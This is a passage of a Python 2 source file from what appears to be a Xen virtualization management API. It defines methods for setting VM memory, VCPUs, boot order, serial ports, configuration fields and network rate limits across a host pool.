return self._VM_save(dom)
def VM_set_memory_dynamic_min(self, session, vm_ref, mem):
'''
@author: wuyuewen
@summary: Set VM's memory dynamic min.
@precondition: VM not running, memory dynamic min >= memory static min.
@param session: session of RPC.
@param vm_ref: uuid
@param mem: memory(Bytes)
@return: True | False.
@rtype: dict.
@raise XendConfigError:
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_set_memory_dynamic_min(session, vm_ref, mem)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, 'VM_set_memory_dynamic_min', vm_ref, mem)
else:
return self._VM_set_memory_dynamic_min(session, vm_ref, mem)
def _VM_set_memory_dynamic_min(self, session, vm_ref, mem):
'''
@author: wuyuewen
@summary: Internal method. Set VM's memory dynamic min.
@precondition: VM not running, memory dynamic min >= memory static min.
@param session: session of RPC.
@param vm_ref: uuid
@param mem: memory(Bytes)
@return: True | False.
@rtype: dict.
@raise XendConfigError:
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
dom.set_memory_dynamic_min(int(mem))
return self._VM_save(dom)
def VM_set_memory_static_max(self, session, vm_ref, mem):
'''
@author: wuyuewen
@summary: Set VM's memory static max.
@precondition: VM not running, memory static max > 0, memory dynamic max <= memory static max.
@param session: session of RPC.
@param vm_ref: uuid
@param mem: memory(Bytes)
@return: True | False.
@rtype: dict.
@raise XendConfigError:
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_set_memory_static_max(session, vm_ref, mem)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, 'VM_set_memory_static_max', vm_ref, mem)
else:
return self._VM_set_memory_static_max(session, vm_ref, mem)
def _VM_set_memory_static_max(self, session, vm_ref, mem):
'''
@author: wuyuewen
@summary: Internal method. Set VM's memory static max.
@precondition: VM not running, memory static max > 0, memory dynamic max <= memory static max.
@param session: session of RPC.
@param vm_ref: uuid
@param mem: memory(Bytes)
@return: True | False.
@rtype: dict.
@raise XendConfigError:
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
dom.set_memory_static_max(int(mem))
return self._VM_save(dom)
def VM_set_memory_static_min(self, session, vm_ref, mem):
'''
@author: wuyuewen
@summary: Set VM's memory static min.
@precondition: VM not running, memory dynamic min >= memory static min.
@param session: session of RPC.
@param vm_ref: uuid
@param mem: memory(Bytes)
@return: True | False.
@rtype: dict.
@raise XendConfigError:
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_set_memory_static_min(session, vm_ref, mem)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, 'VM_set_memory_static_min', vm_ref, mem)
else:
return self._VM_set_memory_static_min(session, vm_ref, mem)
def _VM_set_memory_static_min(self, session, vm_ref, mem):
'''
@author: wuyuewen
@summary: Internal method. Set VM's memory static min.
@precondition: VM not running, memory dynamic min >= memory static min.
@param session: session of RPC.
@param vm_ref: uuid
@param mem: memory(Bytes)
@return: True | False.
@rtype: dict.
@raise XendConfigError:
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
dom.set_memory_static_min(int(mem))
return self._VM_save(dom)
def VM_set_memory_dynamic_max_live(self, session, vm_ref, mem):
'''
@author: wuyuewen
@summary: Set VM's memory dynamic max when VM is running.
@precondition: memory dynamic max > 0, memory dynamic max <= memory static max.
@param session: session of RPC.
@param vm_ref: uuid
@param mem: memory(Bytes)
@return: True | False.
@rtype: dict.
@raise XendConfigError:
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_set_memory_dynamic_max_live(session, vm_ref, mem)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, 'VM_set_memory_dynamic_max_live', vm_ref, mem)
else:
return self._VM_set_memory_dynamic_max_live(session, vm_ref, mem)
def _VM_set_memory_dynamic_max_live(self, session, vm_ref, mem):
'''
@author: wuyuewen
@summary: Internal method. Set VM's memory dynamic max when VM is running.
@precondition: memory dynamic max > 0, memory dynamic max <= memory static max.
@param session: session of RPC.
@param vm_ref: uuid
@param mem: memory(Bytes)
@return: True | False.
@rtype: dict.
@raise XendConfigError:
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
log.debug(int(mem))
dom.set_memory_dynamic_max(int(mem))
# need to pass target as MiB
dom.setMemoryTarget(int(mem)/1024/1024)
return xen_api_success_void()
def VM_set_memory_dynamic_min_live(self, session, vm_ref, mem):
'''
@author: wuyuewen
@summary: Set VM's memory dynamic min when VM is running.
@precondition: memory dynamic min >= memory static min.
@param session: session of RPC.
@param vm_ref: uuid
@param mem: memory(Bytes)
@return: True | False.
@rtype: dict.
@raise XendConfigError:
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_set_memory_dynamic_min_live(session, vm_ref, mem)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, 'VM_set_memory_dynamic_min_live', vm_ref, mem)
else:
return self._VM_set_memory_dynamic_min_live(session, vm_ref, mem)
def _VM_set_memory_dynamic_min_live(self, session, vm_ref, mem):
'''
@author: wuyuewen
@summary: Internal method. Set VM's memory dynamic min when VM is running.
@precondition: memory dynamic min >= memory static min.
@param session: session of RPC.
@param vm_ref: uuid
@param mem: memory(Bytes)
@return: True | False.
@rtype: dict.
@raise XendConfigError:
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
dom.set_memory_dynamic_min(int(mem))
# need to pass target as MiB
dom.setMemoryTarget(int(mem) / 1024 / 1024)
return xen_api_success_void()
def VM_set_VCPUs_params(self, session, vm_ref, value):
'''
@deprecated: not used
'''
return self.VM_set('vcpus_params', session, vm_ref, value)
def VM_add_to_VCPUs_params(self, session, vm_ref, key, value):
'''
@deprecated: not used
'''
log.debug('in VM_add_to_VCPUs_params')
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
if 'vcpus_params' not in dom.info:
dom.info['vcpus_params'] = {}
dom.info['vcpus_params'][key] = value
return self._VM_save(dom)
def VM_add_to_VCPUs_params_live(self, session, vm_ref, key, value):
'''
@deprecated: not used
'''
self.VM_add_to_VCPUs_params(session, vm_ref, key, value)
self._VM_VCPUs_params_refresh(vm_ref)
return xen_api_success_void()
def _VM_VCPUs_params_refresh(self, vm_ref):
'''
@deprecated: not used
'''
xendom = XendDomain.instance()
xeninfo = xendom.get_vm_by_uuid(vm_ref)
#update the cpumaps
for key, value in xeninfo.info['vcpus_params'].items():
if key.startswith("cpumap"):
log.debug(key)
if len(key) == 6:
continue
vcpu = int(key[6:])
try:
cpus = map(int, value.split(","))
xendom.domain_pincpu(xeninfo.getDomid(), vcpu, value)
except Exception, ex:
log.exception(ex)
#need to update sched params aswell
if 'weight' in xeninfo.info['vcpus_params'] \
and 'cap' in xeninfo.info['vcpus_params']:
weight = xeninfo.info['vcpus_params']['weight']
xendom.domain_sched_credit_set(xeninfo.getDomid(), weight)
def VM_set_VCPUs_number_live(self, _, vm_ref, num):
'''
@author: wuyuewen
@summary: Set VM's VCPUs number when VM is running.
@precondition: num > 0, num < max_cpu_limit(see /etc/xen/setting).
@param session: session of RPC.
@param vm_ref: uuid
@param num: num of VCPU
@return: True | False.
@rtype: dict.
@raise XendError:
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_set_VCPUs_number_live(_, vm_ref, num)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_set_VCPUs_number_live', vm_ref, num)
else:
return self._VM_set_VCPUs_number_live(_, vm_ref, num)
def _VM_set_VCPUs_number_live(self, _, vm_ref, num):
'''
@author: wuyuewen
@summary: Internal method. Set VM's VCPUs number when VM is running.
@precondition: num > 0, num < max_cpu_limit(see /etc/xen/setting).
@param session: session of RPC.
@param vm_ref: uuid
@param num: num of VCPU
@return: True | False.
@rtype: dict.
@raise XendError:
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
dom.setVCpuCount(int(num))
return xen_api_success_void()
def VM_remove_from_VCPUs_params(self, session, vm_ref, key):
'''
@deprecated: not used
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
if 'vcpus_params' in dom.info \
and key in dom.info['vcpus_params']:
del dom.info['vcpus_params'][key]
return self._VM_save(dom)
else:
return xen_api_success_void()
def VM_set_VCPUs_at_startup(self, session, vm_ref, num):
'''
@author: wuyuewen
@summary: Set VM's VCPUs when vm startup.
@todo: do not work
@precondition: VM not running, num > 0, num < max_cpu_limit(see /etc/xen/setting).
@param session: session of RPC.
@param vm_ref: uuid
@param num: num of VCPU
@return: True | False.
@rtype: dict.
@raise XendError:
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_set_VCPUs_at_startup(session, vm_ref, num)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_set_VCPUs_at_startup', vm_ref, num)
else:
return self._VM_set_VCPUs_at_startup(session, vm_ref, num)
def _VM_set_VCPUs_at_startup(self, session, vm_ref, num):
'''
@author: wuyuewen
@summary: Internal method. Set VM's VCPUs when vm startup.
@todo: do not work
@precondition: VM not running, num > 0, num < max_cpu_limit(see /etc/xen/setting).
@param session: session of RPC.
@param vm_ref: uuid
@param num: num of VCPU
@return: True | False.
@rtype: dict.
@raise XendError:
'''
return self.VM_set('VCPUs_at_startup', session, vm_ref, num)
def VM_set_VCPUs_max(self, session, vm_ref, num):
'''
@author: wuyuewen
@summary: Internal method. Set VM's VCPUs number.
@precondition: VM not running, num > 0, num < max_cpu_limit(see /etc/xen/setting).
@param session: session of RPC.
@param vm_ref: uuid
@param num: num of VCPU
@return: True | False.
@rtype: dict.
@raise XendError:
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_set_VCPUs_max(session, vm_ref, num)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_set_VCPUs_max', vm_ref, num)
else:
return self._VM_set_VCPUs_max(session, vm_ref, num)
def _VM_set_VCPUs_max(self, session, vm_ref, num):
'''
@author: wuyuewen
@summary: Internal method. Set VM's VCPUs number.
@precondition: VM not running, num > 0, num < max_cpu_limit(see /etc/xen/setting).
@param session: session of RPC.
@param vm_ref: uuid
@param num: num of VCPU
@return: True | False.
@rtype: dict.
@raise XendError:
'''
dominfo = XendDomain.instance().get_vm_by_uuid(vm_ref)
dominfo.setVCpuCount(int(num))
return xen_api_success_void()
# return self.VM_set('VCPUs_max', session, vm_ref, num)
def VM_set_actions_after_shutdown(self, session, vm_ref, action):
'''
@deprecated: not used
'''
if action not in XEN_API_ON_NORMAL_EXIT:
return xen_api_error(['VM_ON_NORMAL_EXIT_INVALID', vm_ref])
return self.VM_set('actions_after_shutdown', session, vm_ref, action)
def VM_set_actions_after_reboot(self, session, vm_ref, action):
'''
@deprecated: not used
'''
if action not in XEN_API_ON_NORMAL_EXIT:
return xen_api_error(['VM_ON_NORMAL_EXIT_INVALID', vm_ref])
return self.VM_set('actions_after_reboot', session, vm_ref, action)
def VM_set_actions_after_suspend(self, session, vm_ref, action):
'''
@deprecated: not used
'''
if action not in XEN_API_ON_NORMAL_EXIT:
return xen_api_error(['VM_ON_NORMAL_EXIT_INVALID', vm_ref])
return self.VM_set('actions_after_suspend', session, vm_ref, action)
def VM_set_actions_after_crash(self, session, vm_ref, action):
'''
@deprecated: not used
'''
if action not in XEN_API_ON_CRASH_BEHAVIOUR:
return xen_api_error(['VM_ON_CRASH_BEHAVIOUR_INVALID', vm_ref])
return self.VM_set('actions_after_crash', session, vm_ref, action)
# edit by wufan
# value :cd ,boot from disk
# value :dc , boot from cdrom
# change when vm is not running
def VM_set_boot_order(self, session, vm_ref, value):
'''
@author: wuyuewen
@summary: Set VM's boot priority, value=cd means boot from disk, value=dc means boot from cdrom.
@precondition: VM not running.
@param session: session of RPC.
@param vm_ref: uuid
@param value: cd/dc
@return: True | False.
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_set_boot_order(session, vm_ref, value)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_set_boot_order', vm_ref, value)
else:
return self._VM_set_boot_order(session, vm_ref, value)
def _VM_set_boot_order(self, session, vm_ref, value):
'''
@author: wuyuewen
@summary: Internal method. Set VM's boot priority, value=cd means boot from disk, value=dc means boot from cdrom.
@precondition: VM not running.
@param session: session of RPC.
@param vm_ref: uuid
@param value: cd/dc
@return: True | False.
@rtype: dict.
'''
log.debug('set boot order: %s' % value)
# VM_add_to_HVM_boot_params
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
if 'HVM_boot_params' not in dom.info:
dom.info['HVM_boot_params'] = {}
dom.info['HVM_boot_params']['order'] = value
# VM_add_to_platform
plat = dom.get_platform()
plat['boot'] = value
dom.info['platform'] = plat
# VM_set_HVM_boot_policy
dom.info['HVM_boot_policy'] = 'BIOS order'
return self._VM_save(dom)
# get serial path on host
def VM_get_platform_serial(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Get Host TCP port of VM's platform serial.
@param session: session of RPC.
@param vm_ref: uuid
@return: True | False.
@rtype: dict.
'''
log.debug('VM get platform serial')
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_get_platform_serial(session, vm_ref)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_get_platform_serial', vm_ref)
else:
return self._VM_get_platform_serial(session, vm_ref)
# get serial devices in platform
def _VM_get_platform_serial(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Internal method. Get Host TCP port of VM's platform serial.
@param session: session of RPC.
@param vm_ref: uuid
@return: True | False.
@rtype: dict.
'''
# get serial file path
try:
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
plat = dom.get_platform()
value = plat.get('serial')
index = value.find('tcp:127.0.0.1:')
retv = ()
if index != -1:
port = value[index+14:19]
retv = ('127.0.0.1', port)
return xen_api_success(retv)
except Exception, exn:
log.exception(exn)
return xen_api_error('get serial path failed')
# set serial devices in platform
# eg: serial pipe:/tmp/fifotest
def VM_set_platform_serial(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Auto find and set a vailed Host TCP port to VM's platform serial,
the port range is 14000-15000, see PORTS_FOR_SERIAL.
@param session: session of RPC.
@param vm_ref: uuid
@return: True | False.
@rtype: dict.
@raise xen_api_error:
'''
log.debug('VM_set_platform_serial')
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_set_platform_serial(session, vm_ref)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_set_platform_serial', vm_ref)
else:
return self._VM_set_platform_serial(session, vm_ref)
# set serial devices in platform
def _VM_set_platform_serial(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Internal method. Auto find and set a vailed Host TCP port to VM's platform serial,
the port range is 14000-15000, see PORTS_FOR_SERIAL.
@param session: session of RPC.
@param vm_ref: uuid
@return: True | False.
@rtype: dict.
@raise xen_api_error:
'''
# get serial file path
# save in the same path with boot vbd
try:
xennode = XendNode.instance()
sysvdi_path = xennode.get_sysvdi_path_by_vm(vm_ref)
if sysvdi_path == '':
log.debug('Invalid system vdi path in vm_ref: %s' % vm_ref)
return xen_api_error("Invalid system vdi path")
# file_name = 'pipe.out'
# SERIAL_FILE = "%s/%s" % (sysvdi_path, file_name)
# if not os.path.exists(SERIAL_FILE):
# os.system("/usr/bin/mkfifo %s" % SERIAL_FILE)
#
# serial_value = 'pipe:%s' % SERIAL_FILE
# log.debug('set serial value: %s' % serial_value)
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
avail_port = dom.get_free_port()
serial_value = 'tcp:127.0.0.1:%s,server,nowait' % avail_port
log.debug('set serial value: %s' % serial_value)
plat = dom.get_platform()
# log.debug('origin platform serial: %s' % plat['serial'])
plat['serial'] = serial_value
dom.info['platform'] = plat
return self._VM_save(dom)
except Exception, exn:
log.debug(exn)
return xen_api_error('create serial failed')
def VM_send_request_via_serial(self, session, vm_ref, json_obj, flag):
'''
@author: wuyuewen
@summary: Send a request into VM's system use serial device.
@precondition: VM is running, has a serial device, already installed a serial Agent in VM's system.
@param session: session of RPC.
@param vm_ref: uuid
@param json_obj: serial request value use json object.
@param flag: True | False, do/don't checkout whether serial Agent is running in VM or not.
@return: True | False.
@rtype: dict.
'''
log.debug('VM send request via serial')
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_send_request_via_serial(session, vm_ref, json_obj, flag)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_send_request_via_serial', vm_ref, json_obj, flag)
else:
return self._VM_send_request_via_serial(session, vm_ref, json_obj, flag)
def _VM_send_request_via_serial(self, session, vm_ref, json_obj, flag):
'''
@author: wuyuewen
@summary: Internal method. Send a request into VM's system use serial device.
@precondition: VM is running, has a serial device, already installed a serial Agent in VM's system.
@param session: session of RPC.
@param vm_ref: uuid
@param json_obj: serial request value use json object.
@param flag: True | False, do/don't checkout whether serial Agent is running in VM or not.
@return: True | False.
@rtype: dict.
'''
try:
response = self._VM_get_platform_serial(session, vm_ref)
if cmp(response['Status'], 'Failure') == 0:
return xen_api_success(False)
address = response.get('Value')
if not address:
log.error('VM serial not correct!')
return xen_api_success(False)
(ip, port) = address
retv = Netctl.serial_opt(ip, port, json_obj, flag)
if retv:
return xen_api_success(True)
else:
return xen_api_success(False)
except Exception ,exn:
log.exception(exn)
return xen_api_success(False)
# edit by wufan
def VM_set_HVM_boot_policy(self, session, vm_ref, value):
'''
@deprecated: not used
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_set_HVM_boot_policy(session, vm_ref, value)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_set_HVM_boot_policy', vm_ref, value)
else:
return self._VM_set_HVM_boot_policy(session, vm_ref, value)
def _VM_set_HVM_boot_policy(self, session, vm_ref, value):
'''
@deprecated: not used
'''
if value != "" and value != "BIOS order":
return xen_api_error(
['VALUE_NOT_SUPPORTED', 'VM.HVM_boot_policy', value,
'Xend supports only the "BIOS order" boot policy.'])
else:
return self.VM_set('HVM_boot_policy', session, vm_ref, value)
def VM_set_HVM_boot_params(self, session, vm_ref, value):
'''
@deprecated: not used
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_set_HVM_boot_params(session, vm_ref, value)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_set_HVM_boot_params', vm_ref, value)
else:
return self._VM_set_HVM_boot_params(session, vm_ref, value)
def _VM_set_HVM_boot_params(self, session, vm_ref, value):
'''
@deprecated: not used
'''
return self.VM_set('HVM_boot_params', session, vm_ref, value)
def VM_add_to_HVM_boot_params(self, session, vm_ref, key, value):
'''
@deprecated: not used
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_add_to_HVM_boot_params(session, vm_ref, key, value)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_add_to_HVM_boot_params', vm_ref, key, value)
else:
return self._VM_add_to_HVM_boot_params(session, vm_ref, key, value)
def _VM_add_to_HVM_boot_params(self, session, vm_ref, key, value):
'''
@deprecated: not used
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
if 'HVM_boot_params' not in dom.info:
dom.info['HVM_boot_params'] = {}
dom.info['HVM_boot_params'][key] = value
return self._VM_save(dom)
def VM_remove_from_HVM_boot_params(self, session, vm_ref, key):
'''
@deprecated: not used
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_remove_from_HVM_boot_params(session, vm_ref, key)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_remove_from_HVM_boot_params', vm_ref, key)
else:
return self._VM_remove_from_HVM_boot_params(session, vm_ref, key)
def _VM_remove_from_HVM_boot_params(self, session, vm_ref, key):
'''
@deprecated: not used
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
if 'HVM_boot_params' in dom.info \
and key in dom.info['HVM_boot_params']:
del dom.info['HVM_boot_params'][key]
return self._VM_save(dom)
else:
return xen_api_success_void()
def VM_set_PV_bootloader(self, session, vm_ref, value):
'''
@deprecated: not used
'''
return self.VM_set('PV_bootloader', session, vm_ref, value)
def VM_set_PV_kernel(self, session, vm_ref, value):
'''
@deprecated: not used
'''
return self.VM_set('PV_kernel', session, vm_ref, value)
def VM_set_PV_ramdisk(self, session, vm_ref, value):
'''
@deprecated: not used
'''
return self.VM_set('PV_ramdisk', session, vm_ref, value)
def VM_set_PV_args(self, session, vm_ref, value):
'''
@deprecated: not used
'''
return self.VM_set('PV_args', session, vm_ref, value)
def VM_set_PV_bootloader_args(self, session, vm_ref, value):
'''
@deprecated: not used
'''
return self.VM_set('PV_bootloader_args', session, vm_ref, value)
def VM_set_platform(self, session, vm_ref, value):
'''
@deprecated: not used
'''
return self.VM_set('platform', session, vm_ref, value)
# edit by wufan
def VM_add_to_platform(self, session, vm_ref, key, value):
'''
@author: wuyuewen
@summary: Change a attribute in VM paltform.
@precondition: VM not running, key exists in platform field.
@param session: session of RPC.
@param vm_ref: uuid
@param key: attribute in VM platform field.
@param value: value to change.
@return: True | False.
@rtype: dict.
@raise xen_api_error: key error
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_add_to_platform(session, vm_ref, key, value)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_add_to_platform', vm_ref, key, value)
else:
return self._VM_add_to_platform(session, vm_ref, key, value)
def _VM_add_to_platform(self, session, vm_ref, key, value):
'''
@author: wuyuewen
@summary: Internal method. Change a attribute in VM paltform.
@precondition: VM not running, key exists in platform field.
@param session: session of RPC.
@param vm_ref: uuid
@param key: attribute in VM platform field.
@param value: value to change.
@return: True | False.
@rtype: dict.
@raise xen_api_error: key error
'''
try:
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
plat = dom.get_platform()
plat[key] = value
return self.VM_set_platform(session, vm_ref, plat)
except KeyError:
return xen_api_error(['key error', vm_ref, key])
def VM_remove_from_platform(self, session, vm_ref, key):
'''
@deprecated: not used
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
plat = dom.get_platform()
if key in plat:
del plat[key]
return self.VM_set_platform(session, vm_ref, plat)
else:
return xen_api_success_void()
def VM_set_other_config(self, session, vm_ref, value):
'''
@author: wuyuewen
@summary: Set VM other config field.
@param session: session of RPC.
@param vm_ref: uuid
@param value: a dict structure of other config.
@return: True | False.
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_set_other_config(session, vm_ref, value)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_set_other_config', vm_ref, value)
else:
return self._VM_set_other_config(session, vm_ref, value)
def _VM_set_other_config(self, session, vm_ref, value):
'''
@author: wuyuewen
@summary: Internal method. Set VM other config field.
@param session: session of RPC.
@param vm_ref: uuid
@param value: a dict structure of other config.
@return: True | False.
@rtype: dict.
'''
return self.VM_set('other_config', session, vm_ref, value)
def VM_add_to_other_config(self, session, vm_ref, key, value):
'''
@author: wuyuewen
@summary: Add a attribute to VM other config field.
@param session: session of RPC.
@param vm_ref: uuid
@param key: attribute key.
@param value: attribute value.
@return: True | False.
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_add_to_other_config(session, vm_ref, key, value)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_add_to_other_config', vm_ref, key, value)
else:
return self._VM_add_to_other_config(session, vm_ref, key, value)
def _VM_add_to_other_config(self, session, vm_ref, key, value):
'''
@author: wuyuewen
@summary: Interal method. Add a attribute to VM other config field.
@param session: session of RPC.
@param vm_ref: uuid
@param key: attribute key.
@param value: attribute value.
@return: True | False.
@rtype: dict.
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
if dom and 'other_config' in dom.info:
dom.info['other_config'][key] = value
return self._VM_save(dom)
def VM_add_tags(self, session, vm_ref, value):
'''
@deprecated: not used
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_add_tags(session, vm_ref, value)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_add_tags', vm_ref, value)
else:
return self._VM_add_tags(session, vm_ref, value)
def _VM_add_tags(self, session, vm_ref, value):
'''
@deprecated: not used
'''
dom = XendDomain.instance().get_vm_by_uuid(vm_ref)
if dom and 'tags' in dom.info:
dom.info['tags'].append(value)
return self._VM_save(dom)
def VM_set_tags(self, session, vm_ref, value):
'''
@deprecated: not used
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_set_tags(session, vm_ref, value)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_set_tags', vm_ref, value)
else:
return self._VM_set_tags(session, vm_ref, value)
def _VM_set_tags(self, session, vm_ref, value):
'''
@deprecated: not used
'''
return self.VM_set('tags', session, vm_ref, value)
def _VM_update_rate(self, session, vm_ref, type, vif_refs):
'''
@deprecated: not used
'''
eth_list = []
for vif_ref in vif_refs:
device = self.VIF_get_device(session, vif_ref).get('Value')
if device != '' and device.startswith('eth'):
eth_num = device[3:]
eth_list.append(eth_num)
#log.debug("--------------->eth list:%s" % eth_list)
xd = XendDomain.instance()
dominfo = xd.get_vm_by_uuid(vm_ref)
final_tag_list = {}
try:
other_config = self.VM_get_other_config( session, vm_ref).get('Value')
#log.debug('VM update tag')
if other_config:
tag_list = other_config.get(type, {})
if tag_list and isinstance(tag_list, dict):
for key, value in tag_list.items():
if key in eth_list:
final_tag_list[key] = value
dominfo.info['other_config'][type] = final_tag_list
self._VM_save(dominfo)
log.debug('VM_update_%s' % type)
return xen_api_success_void()
except Exception, exn:
log.exception(exn)
return xen_api_success_void()
#add by wufan
def _VM_update_tag(self, session, vm_ref, vif_refs):
'''
@deprecated: not used
'''
eth_list = []
for vif_ref in vif_refs:
device = self.VIF_get_device(session, vif_ref).get('Value')
if device != '' and device.startswith('eth'):
eth_num = device[3:]
eth_list.append(eth_num)
#log.debug("--------------->eth list:%s" % eth_list)
xd = XendDomain.instance()
dominfo = xd.get_vm_by_uuid(vm_ref)
final_tag_list = {}
try:
other_config = self.VM_get_other_config( session, vm_ref).get('Value')
#log.debug('VM update tag')
if other_config:
tag_list = other_config.get('tag', {})
if tag_list and isinstance(tag_list, dict):
for key, value in tag_list.items():
if key in eth_list:
final_tag_list[key] = value
dominfo.info['other_config']['tag'] = final_tag_list
self._VM_save(dominfo)
log.debug('VM_update_tag')
return xen_api_success_void()
except Exception, exn:
log.exception(exn)
return xen_api_success_void()
#add by wufan
def VM_set_all_rate(self, session, vm_ref, param_type, tag_list=None):
'''
@author: wuyuewen
@summary: Set all VIF's rate and burst limit controlled by OVS,
this attribute stored in VM's other_config field.
@param session: session of RPC.
@param vm_ref: uuid
@param param_type: rate/burst, rate is the rate(kbps) of VIF port controlled by OVS,
burst(kbps) is the volatility overhead rate.
@param tag_list: dict of rate for each VIF, the structure is {eth_num : rate}, e.g. {0:1000, 1:1000}
@return: True | False.
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_set_all_rate(session, vm_ref, param_type, tag_list)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_set_all_rate', vm_ref, param_type, tag_list)
else:
return self._VM_set_all_rate(session, vm_ref, param_type, tag_list)
